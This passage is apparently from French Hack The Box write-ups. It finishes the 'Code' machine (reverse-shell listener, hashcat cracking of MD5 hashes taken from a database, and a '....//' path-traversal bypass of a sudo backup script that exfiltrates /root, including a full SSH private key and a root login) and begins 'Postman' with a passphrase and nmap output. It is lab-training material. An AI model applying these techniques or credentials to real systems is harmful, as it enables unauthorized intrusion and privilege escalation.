class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Code<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.4<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.62<span class="o">]</span> <span class="m">32960</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>5014<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">app-production@code:~/app$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">app-production </span></span><span class="line"><span class="cl">app-production@code:~/app$ cat ../user.txt </span></span><span class="line"><span class="cl">cat ../user.txt </span></span><span class="line"><span class="cl">8f81.....e49f </span></span></code></pre></td></tr></table> </div> </div><h3 id="databasedb--martins-password">database.db : martin&rsquo;s password </h3><p>On trouve un fichier database.db.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">app-production@code:~/app$ grep -rni pass </span></span><span class="line"><span class="cl">app.py:17: <span class="nv">password</span> <span class="o">=</span> db.Column<span class="o">(</span>db.String<span class="o">(</span>80<span class="o">)</span>, <span class="nv">nullable</span><span class="o">=</span>False<span class="o">)</span> </span></span><span class="line"><span class="cl">app.py:43: <span class="nv">password</span> <span class="o">=</span> hashlib.md5<span class="o">(</span>request.form<span class="o">[</span><span class="s1">&#39;password&#39;</span><span class="o">]</span>.encode<span class="o">())</span>.hexdigest<span class="o">()</span> </span></span><span class="line"><span class="cl">app.py:48: <span class="nv">new_user</span> <span class="o">=</span> User<span class="o">(</span><span class="nv">username</span><span class="o">=</span>username, <span class="nv">password</span><span class="o">=</span>password<span class="o">)</span> </span></span><span class="line"><span class="cl">app.py:60: <span class="nv">password</span> <span class="o">=</span> hashlib.md5<span class="o">(</span>request.form<span class="o">[</span><span class="s1">&#39;password&#39;</span><span class="o">]</span>.encode<span class="o">())</span>.hexdigest<span class="o">()</span> </span></span><span class="line"><span class="cl">app.py:61: <span class="nv">user</span> <span class="o">=</span> User.query.filter_by<span class="o">(</span><span class="nv">username</span><span class="o">=</span>username, <span class="nv">password</span><span class="o">=</span>password<span class="o">)</span>.first<span class="o">()</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="o">&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</span>&lt;&lt;&gt;&gt; </span></span><span class="line"><span class="cl">Binary file instance/database.db matches </span></span><span class="line"><span class="cl"><span class="o">&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;</span>&lt;&lt;&gt;&gt; </span></span></code></pre></td></tr></table> </div> </div><p>On trouve rapidement un hachage du mot de passe de martin, en affichant directement database.db sans meme passer par sqlite.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">app-production@code:~/app$ grep -rnia martin </span></span><span class="line"><span class="cl"><span class="c1">## 3de6f30c4a09c27fc71932bfc68474be &lt;-----------</span> </span></span><span class="line"><span class="cl">���QQR*Mmartin3de6f30c4a09c27fc71932bfc68474be/#Mdevelopment759b74ce43947f5f4c91aeddc3e5bad3 </span></span><span class="line"><span class="cl">���<span class="p">&amp;</span><span class="nv">$nceCprint</span><span class="o">(</span><span class="s2">&#34;Functionality test&#34;</span><span class="o">)</span>Testent </span></span><span class="line"><span class="cl">$ hashcat -m <span class="m">0</span> hash.txt --wordlist ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">3de6f30c4a09c27fc71932bfc68474be:nafeelswordsmaster </span></span></code></pre></td></tr></table> </div> </div><p>development account :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">0</span> hash2.txt --wordlist ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl">759b74ce43947f5f4c91aeddc3e5bad3:development </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="enumeration-with-martin">Enumeration with martin </h3><p>Martin peut executer en tant que root le script /usr/bin/backy.sh :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">martin@code:/home/app-production/app$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> martin on localhost: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User martin may run the following commands on localhost: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL : ALL<span class="o">)</span> NOPASSWD: /usr/bin/backy.sh </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit--usrbinbackysh">Exploit : /usr/bin/backy.sh </h3><p>On met &ldquo;&hellip;.&rdquo; au lieu de &ldquo;..&rdquo; et &ldquo;//&rdquo; au lieu de &ldquo;/&rdquo; car il remplace &ldquo;../&rdquo; quand il le voit. mais quand on eneleve &ldquo;../&rdquo; dans mon cas, ca reconstruit un autre &ldquo;../&rdquo; ! Donc ca marche.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">martin@code:~$ cat t.json </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;destination&#34;</span>: <span class="s2">&#34;/home/martin/backups/&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;multiprocessing&#34;</span>: true, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;verbose_log&#34;</span>: false, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;directories_to_archive&#34;</span>: <span class="o">[</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;/home/....//root/root.txt&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">]</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;exclude&#34;</span>: <span class="o">[</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;.*&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------ </span></span><span class="line"><span class="cl"><span class="c1">## En remplacant par ca, on archive bien le dossier root</span> </span></span><span class="line"><span class="cl">martin@code:~$ cat task.json </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;destination&#34;</span>: <span class="s2">&#34;/home/martin/backups/&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;multiprocessing&#34;</span>: true, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;verbose_log&#34;</span>: false, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;directories_to_archive&#34;</span>: <span class="o">[</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;/home/....//root&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;/var/....//root&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">martin@code:~$ sudo /usr/bin/backy.sh ./task.json </span></span><span class="line"><span class="cl">2025/03/26 11:09:19 🍀 backy 1.2 </span></span><span class="line"><span class="cl">2025/03/26 11:09:19 📋 Working with ./task.json ... </span></span><span class="line"><span class="cl">2025/03/26 11:09:19 💤 Nothing to sync </span></span><span class="line"><span class="cl">2025/03/26 11:09:19 📤 Archiving: <span class="o">[</span>/home/../root /var/../root<span class="o">]</span> </span></span><span class="line"><span class="cl">2025/03/26 11:09:19 📥 To: /home/martin/backups ... </span></span><span class="line"><span class="cl">2025/03/26 11:09:19 📦 </span></span><span class="line"><span class="cl">2025/03/26 11:09:19 📦 📦 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">martin@code:~/backups$ tar -xjf code_var_.._root_2025_March.tar.bz2 </span></span><span class="line"><span class="cl">martin@code:~/backups$ ls </span></span><span class="line"><span class="cl">code_home_app-production_app_2024_August.tar.bz2 code_home_.._root_2025_March.tar.bz2 code_var_.._root_2025_March.tar.bz2 root task.json </span></span><span class="line"><span class="cl">martin@code:~/backups$ <span class="nb">cd</span> root/ </span></span><span class="line"><span class="cl">martin@code:~/backups/root$ ls </span></span><span class="line"><span class="cl">root.txt scripts </span></span><span class="line"><span class="cl">martin@code:~/backups/root$ cat root.txt </span></span><span class="line"><span class="cl">80a6.....33d8 </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh-root">SSH root </h3><p>on récupère aussi les clés ssh de root :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">martin@code:~/backups/root$ <span class="nb">cd</span> .ssh/ </span></span><span class="line"><span class="cl">martin@code:~/backups/root/.ssh$ ls </span></span><span class="line"><span class="cl">authorized_keys id_rsa </span></span><span class="line"><span class="cl">martin@code:~/backups/root/.ssh$ cat id_rsa </span></span><span class="line"><span class="cl">-----BEGIN OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl">b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn </span></span><span class="line"><span class="cl">NhAAAAAwEAAQAAAYEAvxPw90VRJajgkjwxZqXr865V8He/HNHVlhp0CP36OsKSi0DzIZ4K </span></span><span class="line"><span class="cl">sqfjTi/WARcxLTe4lkVSVIV25Ly5M6EemWeOKA6vdONP0QUv6F1xj8f4eChrdp7BOhRe0+ </span></span><span class="line"><span class="cl">zWJna8dYMtuR2K0Cxbdd+qvM7oQLPRelQIyxoR4unh6wOoIf4EL34aEvQDux+3GsFUnT4Y </span></span><span class="line"><span class="cl">MNljAsxyVFn3mzR7nUZ8BAH/Y9xV/KuNSPD4SlVqBiUjUKfs2wD3gjLA4ZQZeM5hAJSmVe </span></span><span class="line"><span class="cl">ZjpfkQOdE+++H8t2P8qGlobLvboZJ2rghY9CwimX0/g0uHvcpXAc6U8JJqo9U41WzooAi6 </span></span><span class="line"><span class="cl">TWxWYbdO3mjJhm0sunCio5xTtc44M0nbhkRQBliPngaBYleKdvtGicPJb1LtjtE5lHpy+N </span></span><span class="line"><span class="cl">Ps1B4EIx+ZlBVaFbIaqxpqDVDUCv0qpaxIKhx/lKmwXiWEQIie0fXorLDqsjL75M7tY/u/ </span></span><span class="line"><span class="cl">M7xBuGl+LHGNBnCsvjLvIA6fL99uV+BTKrpHhgV9AAAFgCNrkTMja5EzAAAAB3NzaC1yc2 </span></span><span class="line"><span class="cl">EAAAGBAL8T8PdFUSWo4JI8MWal6/OuVfB3vxzR1ZYadAj9+jrCkotA8yGeCrKn404v1gEX </span></span><span class="line"><span class="cl">MS03uJZFUlSFduS8uTOhHplnjigOr3TjT9EFL+hdcY/H+Hgoa3aewToUXtPs1iZ2vHWDLb </span></span><span class="line"><span class="cl">kditAsW3XfqrzO6ECz0XpUCMsaEeLp4esDqCH+BC9+GhL0A7sftxrBVJ0+GDDZYwLMclRZ </span></span><span class="line"><span class="cl">95s0e51GfAQB/2PcVfyrjUjw+EpVagYlI1Cn7NsA94IywOGUGXjOYQCUplXmY6X5EDnRPv </span></span><span class="line"><span class="cl">vh/Ldj/KhpaGy726GSdq4IWPQsIpl9P4NLh73KVwHOlPCSaqPVONVs6KAIuk1sVmG3Tt5o </span></span><span class="line"><span class="cl">yYZtLLpwoqOcU7XOODNJ24ZEUAZYj54GgWJXinb7RonDyW9S7Y7ROZR6cvjT7NQeBCMfmZ </span></span><span class="line"><span class="cl">QVWhWyGqsaag1Q1Ar9KqWsSCocf5SpsF4lhECIntH16Kyw6rIy++TO7WP7vzO8Qbhpfixx </span></span><span class="line"><span class="cl">jQZwrL4y7yAOny/fblfgUyq6R4YFfQAAAAMBAAEAAAGBAJZPN4UskBMR7+bZVvsqlpwQji </span></span><span class="line"><span class="cl">Yl7L7dCimUEadpM0i5+tF0fE37puq3SwYcdzpQZizt4lTDn2pBuy9gjkfg/NMsNRWpx7gp </span></span><span class="line"><span class="cl">gIYqkG834rd6VSkgkrizVck8cQRBEI0dZk8CrBss9B+iZSgqlIMGOIl9atHR/UDX9y4LUd </span></span><span class="line"><span class="cl">6v97kVu3Eov5YdQjoXTtDLOKahTCJRP6PZ9C4Kv87l0D/+TFxSvfZuQ24J/ZBdjtPasRa4 </span></span><span class="line"><span class="cl">bDlsf9QfxJQ1HKnW+NqhbSrEamLb5klqMhb30SGQGa6ZMnfF8G6hkiJDts54jsmTxAe7bS </span></span><span class="line"><span class="cl">cWnaKGOEZMivCUdCJwjQrwk0TR/FTzzgTOcxZmcbfjRnXU2NtJiaA8DJCb3SKXshXds97i </span></span><span class="line"><span class="cl">vmNjdD59Py4nGXDdI8mzRfzRS/3jcsZm11Q5vg7NbLJgiOxw1lCSH+TKl7KFe0CEntGGA9 </span></span><span class="line"><span class="cl">QqAtSC5JliB2m5dBG7IOUBa8wDDN2qgPN1TR/yQRHkB5JqbBWJwOuOHSu8qIR3FzSiOQAA </span></span><span class="line"><span class="cl">AMEApDoMoZR7/CGfdUZyc0hYB36aDEnC8z2TreKxmZLCcJKy7bbFlvUT8UX6yF9djYWLUo </span></span><span class="line"><span class="cl">kmSwffuZTjBsizWwAFTnxNfiZWdo/PQaPR3l72S8vA8ARuNzQs92Zmqsrm93zSb4pJFBeJ </span></span><span class="line"><span class="cl">9aYtunsOJoTZ1UIQx+bC/UBKNmUObH5B14+J+5ALRzwJDzJw1qmntBkXO7e8+c8HLXnE6W </span></span><span class="line"><span class="cl">SbYvkkEDWqCR/JhQp7A4YvdZIxh3Iv+71O6ntYBlfx9TXePa1UAAAAwQD45KcBDrkadARG </span></span><span class="line"><span class="cl">vEoxuYsWf+2eNDWa2geQ5Po3NpiBs5NMFgZ+hwbSF7y8fQQwByLKRvrt8inL+uKOxkX0LM </span></span><span class="line"><span class="cl">cXRKqjvk+3K6iD9pkBW4rZJfr/JEpJn/rvbi3sTsDlE3CHOpiG7EtXJoTY0OoIByBwZabv </span></span><span class="line"><span class="cl">1ZGbv+pyHKU5oWFIDnpGmruOpJqjMTyLhs4K7X+1jMQSwP2snNnTGrObWbzvp1CmAMbnQ9 </span></span><span class="line"><span class="cl">vBNJQ5xW5lkQ1jrq0H5ugT1YebSNWLCIsAAADBAMSIrGsWU8S2PTF4kSbUwZofjVTy8hCR </span></span><span class="line"><span class="cl">lt58R/JCUTIX4VPmqD88CJZE4JUA6rbp5yJRsWsIJY+hgYvHm35LAArJJidQRowtI2/zP6 </span></span><span class="line"><span class="cl">/DETz6yFAfCSz0wYyB9E7s7otpvU3BIuKMaMKwt0t9yxZc8st0cev3ikGrVa3yLmE02hYW </span></span><span class="line"><span class="cl">j6PbYp7f9qvasJPc6T8PGwtybdk0LdluZwAC4x2jn8wjcjb5r8LYOgtYI5KxuzsEY2EyLh </span></span><span class="line"><span class="cl">hdENGN+hVCh//jFwAAAAlyb290QGNvZGU<span class="o">=</span> </span></span><span class="line"><span class="cl">-----END OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl">martin@code:~/backups/root/.ssh$ cat authorized_keys </span></span><span class="line"><span class="cl">ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/E/D3RVElqOCSPDFmpevzrlXwd78c0dWWGnQI/fo6wpKLQPMhngqyp+NOL9YBFzEtN7iWRVJUhXbkvLkzoR6ZZ44oDq9040/RBS/oXXGPx/h4KGt2nsE6FF7T7NYmdrx1gy25HYrQLFt136q8zuhAs9F6VAjLGhHi6eHrA6gh/gQvfhoS9AO7H7cawVSdPhgw2WMCzHJUWfebNHudRnwEAf9j3FX8q41I8PhKVWoGJSNQp+zbAPeCMsDhlBl4zmEAlKZV5mOl+RA50T774fy3Y/yoaWhsu9uhknauCFj0LCKZfT+DS4e9ylcBzpTwkmqj1TjVbOigCLpNbFZht07eaMmGbSy6cKKjnFO1zjgzSduGRFAGWI+eBoFiV4p2+0aJw8lvUu2O0TmUenL40+zUHgQjH5mUFVoVshqrGmoNUNQK/SqlrEgqHH+UqbBeJYRAiJ7R9eissOqyMvvkzu1j+78zvEG4aX4scY0GcKy+Mu8gDp8v325X4FMqukeGBX0<span class="o">=</span> root@code </span></span></code></pre></td></tr></table> </div> </div><p>On se connecte en utilisant la cle id_rsa recupere precedemment.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Code<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh root@10.10.11.62 -i id_rsa </span></span><span class="line"><span class="cl">Welcome to Ubuntu 20.04.6 LTS <span class="o">(</span>GNU/Linux 5.4.0-208-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> * Documentation: https://help.ubuntu.com </span></span><span class="line"><span class="cl"> * Management: https://landscape.canonical.com </span></span><span class="line"><span class="cl"> * Support: https://ubuntu.com/pro </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> System information as of Wed <span class="m">26</span> Mar <span class="m">2025</span> 12:38:11 PM UTC </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> System load: 0.06 </span></span><span class="line"><span class="cl"> Usage of /: 52.2% of 5.33GB </span></span><span class="line"><span class="cl"> Memory usage: 18% </span></span><span class="line"><span class="cl"> Swap usage: 0% </span></span><span class="line"><span class="cl"> Processes: <span class="m">237</span> </span></span><span class="line"><span class="cl"> Users logged in: <span class="m">1</span> </span></span><span class="line"><span class="cl"> IPv4 address <span class="k">for</span> eth0: 10.10.11.62 </span></span><span class="line"><span class="cl"> IPv6 address <span class="k">for</span> eth0: dead:beef::250:56ff:fe94:61f7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Expanded Security Maintenance <span class="k">for</span> Applications is not enabled. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="m">0</span> updates can be applied immediately. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Enable ESM Apps to receive additional future security updates. </span></span><span class="line"><span class="cl">See https://ubuntu.com/esm or run: sudo pro status </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The list of available updates is more than a week old. </span></span><span class="line"><span class="cl">To check <span class="k">for</span> new updates run: sudo apt update </span></span><span class="line"><span class="cl">Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Wed Mar <span class="m">26</span> 12:38:11 <span class="m">2025</span> from 10.10.14.4 </span></span><span class="line"><span class="cl">root@code:~# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@code:~# cat root.txt </span></span><span class="line"><span class="cl">80a6.....33d8 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/postman-htb/Thu, 13 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/postman-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Postman cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Postman</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.160</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## SSH key pass phrase</span> </span></span><span class="line"><span class="cl">matt : computer2008 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Postman<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.160 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORTSTATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDem1MnCQG+yciWyLak5YeSzxh4HxjCgxKVfNc1LN+vE1OecEx+cu0bTD5xdQJmyKEkpZ+AVjhQo/esF09a94eMNKcp+bhK1g3wqzLyr6kwE0wTncuKD2bA9LCKOcM6W5GpHKUywB5A/TMPJ7UXeygHseFUZEa+yAYlhFKTt6QTmkLs64sqCna+D/cvtKaB4O9C+DNv5/W66caIaS/B/lPeqLiRoX1ad/GMacLFzqCwgaYeZ9YBnwIstsDcvK9+kCaUE7g2vdQ7JtnX0+kVlIXRi0WXta+BhWuGFWtOV0NYM9IDRkGjSXA4qOyUOBklwvienPt1x2jBrjV8v3p78Tzz </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 